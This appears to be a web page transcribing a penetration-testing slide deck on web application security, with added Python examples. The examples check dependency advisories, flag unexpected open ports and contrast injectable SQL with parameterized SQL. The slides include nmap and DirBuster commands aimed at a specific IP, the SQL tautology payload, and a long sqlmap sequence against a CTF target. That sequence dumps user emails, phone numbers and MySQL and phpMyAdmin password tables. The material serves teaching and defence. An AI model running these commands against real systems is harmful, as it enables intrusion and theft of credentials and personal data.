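The checklist in slides 30 to 44 is largely manual, but one part of it belongs in the build: comparing the exact versions a project pins against an advisory feed, so a dependency that is "known bad" is caught before it ships. The block below is an added example for this page, not code from the deck or from any real advisory service. The advisory entries, package names and identifiers (ADV-EXAMPLE-…) are constructed placeholders, not real CVEs; in practice the feed would come from the NVD or the package ecosystem's own database. The boundary case is the one that bites in practice: the "fixed in" version itself must not be reported, and an unpinned requirement cannot be checked at all, which is itself a finding for the deck's "no known vulnerabilities doesn't mean security" point.

```python
import re
from typing import Dict, List, Tuple

Version = Tuple[int, ...]


def parse_version(text: str) -> Version:
    """'1.10.2' -> (1, 10, 2), so comparisons are numeric ('1.10' sorts after '1.9')."""
    return tuple(int(part) for part in re.findall(r"\d+", text))


def parse_requirements(text: str) -> Dict[str, Version]:
    """Collect exact 'name==x.y.z' pins from a requirements-style file.

    Range specifiers (>=, ~=, unpinned names) are skipped on purpose: without
    an exact version there is nothing to compare against an advisory's range.
    """
    pins: Dict[str, Version] = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()          # drop trailing comments
        match = re.match(r"^([A-Za-z0-9_.-]+)\s*==\s*([0-9][0-9.]*)$", line)
        if match:
            pins[match.group(1).lower()] = parse_version(match.group(2))
    return pins


# Constructed advisory feed for the example: (package, introduced, fixed, id).
# Packages and ids are placeholders, not real advisories or CVE numbers.
ADVISORIES = [
    ("examplelib", "1.0.0", "1.4.2", "ADV-EXAMPLE-0001"),
    ("jsonparse", "0.0.0", "2.1.0", "ADV-EXAMPLE-0002"),
    ("jsonparse", "3.0.0", "3.0.5", "ADV-EXAMPLE-0003"),
]


def check_pins(pins: Dict[str, Version], advisories=ADVISORIES) -> List[str]:
    """Report each pin that falls inside [introduced, fixed) of an advisory."""
    findings = []
    for name, introduced, fixed, adv_id in advisories:
        pinned = pins.get(name.lower())
        if pinned is None:
            continue
        if parse_version(introduced) <= pinned < parse_version(fixed):
            shown = ".".join(str(n) for n in pinned)
            findings.append(f"{name}=={shown} affected by {adv_id} (fixed in {fixed})")
    return findings


# Constructed requirements file. jsonparse==3.0.5 is exactly the fixed version
# of ADV-EXAMPLE-0003 and must NOT be reported.
SAMPLE_REQUIREMENTS = """\
examplelib==1.3.9
jsonparse==3.0.5
webframework==1.1.1
somehttpclient>=2.0   # range specifier: skipped, cannot be checked
"""


def demo() -> List[str]:
    return check_pins(parse_requirements(SAMPLE_REQUIREMENTS))


if __name__ == "__main__":
    for finding in demo():
        print(finding)
```

A passing run here only means no entry in the feed matched; it says nothing about bugs nobody has reported yet, which is the point of slide 43.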
  • 46. Check the number of OPEN services and ports:
    sudo nmap -p- -sS -A IP-Address
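The scan on the slide answers "what is listening?"; the question a platform owner needs answered is "what is listening that was never meant to be?". The block below is an added example for this page, not code from the deck: it parses nmap's grepable output (the `-oG` format, one `Host:` line per host with a `Ports:` field) and diffs the open ports against a per-host allowlist. The scan text and the allowlist are constructed for the example; the hosts and services in it are not real.

```python
from typing import Dict, List, Set, Tuple

# Constructed sample of `nmap -oG -` (grepable) output; not a real scan. Each
# entry in the Ports field is port/state/protocol/owner/service/rpcinfo/version/.
SAMPLE_GNMAP = """\
# Nmap 7.80 scan initiated (constructed sample)
Host: 10.0.0.5 (db01.example.internal)\tStatus: Up
Host: 10.0.0.5 (db01.example.internal)\tPorts: 22/open/tcp//ssh///, 3306/open/tcp//mysql///, 8080/open/tcp//http-proxy///, 111/filtered/tcp//rpcbind///\tIgnored State: closed (65531)
Host: 10.0.0.6 (web01.example.internal)\tPorts: 22/open/tcp//ssh///, 443/open/tcp//https//nginx/\tIgnored State: closed (65533)
# Nmap done (constructed sample)
"""

# What each host is supposed to expose (assumption: taken from the platform's
# design; a database host should only be reachable on ssh from the bastion).
ALLOWLIST: Dict[str, Set[Tuple[int, str]]] = {
    "10.0.0.5": {(22, "tcp")},
    "10.0.0.6": {(22, "tcp"), (443, "tcp")},
}


def parse_gnmap(text: str) -> Dict[str, List[Tuple[int, str, str]]]:
    """Return {host: [(port, proto, service), ...]} for ports nmap reports as open."""
    hosts: Dict[str, List[Tuple[int, str, str]]] = {}
    for line in text.splitlines():
        if not line.startswith("Host:") or "Ports:" not in line:
            continue                                   # comments, Status-only lines
        host = line.split()[1]
        ports_field = line.split("Ports:", 1)[1].split("\t", 1)[0]
        open_ports = hosts.setdefault(host, [])
        for entry in ports_field.split(","):
            fields = entry.strip().split("/")
            if len(fields) < 5:
                continue                               # malformed entry: skip
            port, state, proto, _owner, service = fields[:5]
            if state == "open":
                open_ports.append((int(port), proto, service))
    return hosts


def unexpected_exposure(scan: Dict[str, List[Tuple[int, str, str]]],
                        allowlist: Dict[str, Set[Tuple[int, str]]]) -> Dict[str, List[str]]:
    """Open ports not in the allowlist: exposure nobody signed off on."""
    findings: Dict[str, List[str]] = {}
    for host, ports in scan.items():
        allowed = allowlist.get(host, set())           # unknown host: everything is unexpected
        extra = [f"{port}/{proto} ({service or 'unknown'})"
                 for port, proto, service in ports if (port, proto) not in allowed]
        if extra:
            findings[host] = extra
    return findings


def demo() -> Dict[str, List[str]]:
    return unexpected_exposure(parse_gnmap(SAMPLE_GNMAP), ALLOWLIST)


if __name__ == "__main__":
    for host, extra in demo().items():
        print(host, "unexpected:", ", ".join(extra))
```

Run this on every scheduled scan and alert on a non-empty result; a database port appearing on a host's public interface is exactly the kind of finding behind the breaches in the motivation slides.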
  • 47. Server files / directories: scan for permissions and access.
    java -jar DirBuster-0.12.jar -H -u http://167.71.224.201:1337
    httrack (website copier)
  • 48. Subgraph Vega
    ● Vega is a free and open source web security scanner and web security testing platform to test the security of web applications.
    ● SQL injection
    ● XSS
    ● Inadvertently disclosed sensitive information
    ● Reflected cross-site scripting
    ● Stored cross-site scripting
    ● Blind SQL injection
    ● Remote file include
    ● Shell injection
    ● TLS / SSL security settings
  • 49. Set up the proxy for the Vega tool
  • 50. Set up the proxy for the Vega tool
  • 51. Vega - start the proxy!
  • 52. Vega - start scanning the web application
  • 53. Vega - start scanning the web application
  • 56. Web application - tracing the web request payload at the proxy
  • 57. Web application - tracing the web request payload at the proxy
  • 58. Web application - intercepting the response callback at the proxy
  • 59. SqlMap - a penetration testing tool for exploiting SQL injection flaws, and a lot more!
    ● Database fingerprinting.
    ● Full support for SQL injection techniques: boolean-based blind, time-based blind, error-based, UNION query-based, stacked queries and out-of-band.
    ● Automatic recognition of password hash formats and support for cracking them using a dictionary-based attack.
    ● Dump database tables entirely.
    ● Out-of-the-box search support for database names, table names, column names and values.
    ● Support to execute arbitrary commands and retrieve their standard output.
    ● Support to establish an out-of-band stateful TCP connection between the attacker machine and the database server.
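Both Vega and sqlmap, as described above, find the same root cause: user input concatenated into the SQL text. The block below is an added example for this page, not code from the deck or from either tool. It puts the vulnerable lookup next to its hardened form on an in-memory SQLite table shaped like the deck's `user_profile` (rows are constructed, not real data), and runs the textbook tautology input through both so the difference is visible: the concatenated query returns every row, the parameterized one returns none because the driver sends the value separately and it can never become SQL.

```python
import sqlite3
from typing import List, Tuple

Row = Tuple[str, str, str]


def build_demo_db() -> sqlite3.Connection:
    """In-memory table shaped like the deck's user_profile; the rows are constructed."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE user_profile (email TEXT, mobile TEXT, name TEXT)")
    conn.executemany("INSERT INTO user_profile VALUES (?, ?, ?)", [
        ("alice@example.test", "+10000000001", "Alice"),
        ("bob@example.test", "+10000000002", "Bob"),
    ])
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, email: str) -> List[Row]:
    """The pattern sqlmap detects: the caller's input is pasted into the SQL text."""
    sql = f"SELECT email, mobile, name FROM user_profile WHERE email = '{email}'"
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn: sqlite3.Connection, email: str) -> List[Row]:
    """Hardened form: a placeholder in the SQL, the value passed out of band."""
    sql = "SELECT email, mobile, name FROM user_profile WHERE email = ?"
    return conn.execute(sql, (email,)).fetchall()


# Constructed input: a harmless literal for the parameterized query, a WHERE
# clause rewrite for the concatenated one. It is the classic tautology used in
# every injection tutorial and is here only to show the two behaviours side by side.
TAUTOLOGY = "nobody@example.test' OR '1'='1"


def demo() -> dict:
    """Row counts for a normal lookup and for the tautology, under both query styles."""
    conn = build_demo_db()
    return {
        "normal_vulnerable": len(lookup_vulnerable(conn, "alice@example.test")),
        "normal_parameterized": len(lookup_parameterized(conn, "alice@example.test")),
        "tautology_vulnerable": len(lookup_vulnerable(conn, TAUTOLOGY)),
        "tautology_parameterized": len(lookup_parameterized(conn, TAUTOLOGY)),
    }


if __name__ == "__main__":
    for label, count in demo().items():
        print(f"{label}: {count} row(s)")
```

The fix is not input filtering but the placeholder: with `?` parameters the database parses the statement before it ever sees the value, so the `-C Email, Mobile, Name --dump` step in the sqlmap slides has nothing to work with.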
  • 60. Demo - Penetration testing a web application using SQLMap
  • 61. Demo - Penetration testing a web application using SQLMap
  • 62. Demo - Penetration testing a web application using SQLMap
  • 63. Demo - Penetration testing a web application using SQLMap
  • 64. Demo - Penetration testing a web application using SQLMap
  • 65. Demo - Penetration testing a web application using SQLMap
  • 66. Demo - Penetration testing a web application using SQLMap
  • 67. Demo - Penetration testing a web application using SQLMap
  • 68. Demo - Penetration testing a web application using SQLMap
  • 69. SQLMap - Commands
    python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs
    python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D ctf --tables
    python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D ctf --tables user_profile
    python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D ctf --tables
    python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D ctf -T user_profile --columns
    python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D ctf -T user_profile -C Email, Mobile, Name --dump
    python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D ctf -T ctf --columns
    python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D ctf -T flag
    python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D ctf -T flag --columns
    python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D ctf -T flag -C Flag1
    python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D ctf -T flag --columns
    python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D ctf -T flag -C Flag1
    python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D ctf -T flag -C Flag1 --dump
    python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs
    python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D mysql
    python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D mysql --tables
    python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D mysql -T users --columns
    python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D mysql -T user --columns
    python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D mysql -T user -C User, Password
    python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D mysql -T user -C User, Password
    python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D mysql -T user -C User, Password --dump
    python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs
    python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D test
    python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D test --columns
    python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D test --tables
    python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D phpmyadmin --tables
    python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D phpmyadmin -T pma__users --columns
    python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D phpmyadmin -T pma__users --columns --dump
    https://gist.github.com/chetkhatri/45b76d3f2d1da1d798d86a8709f33ac5
  • 71. Hope you had fun!
  • 72. Thank you! Chetan Khatri, chetan.khatri@live.com, @khatri_chetan - https://twitter.com/khatri_chetan https://github.com/chetkhatri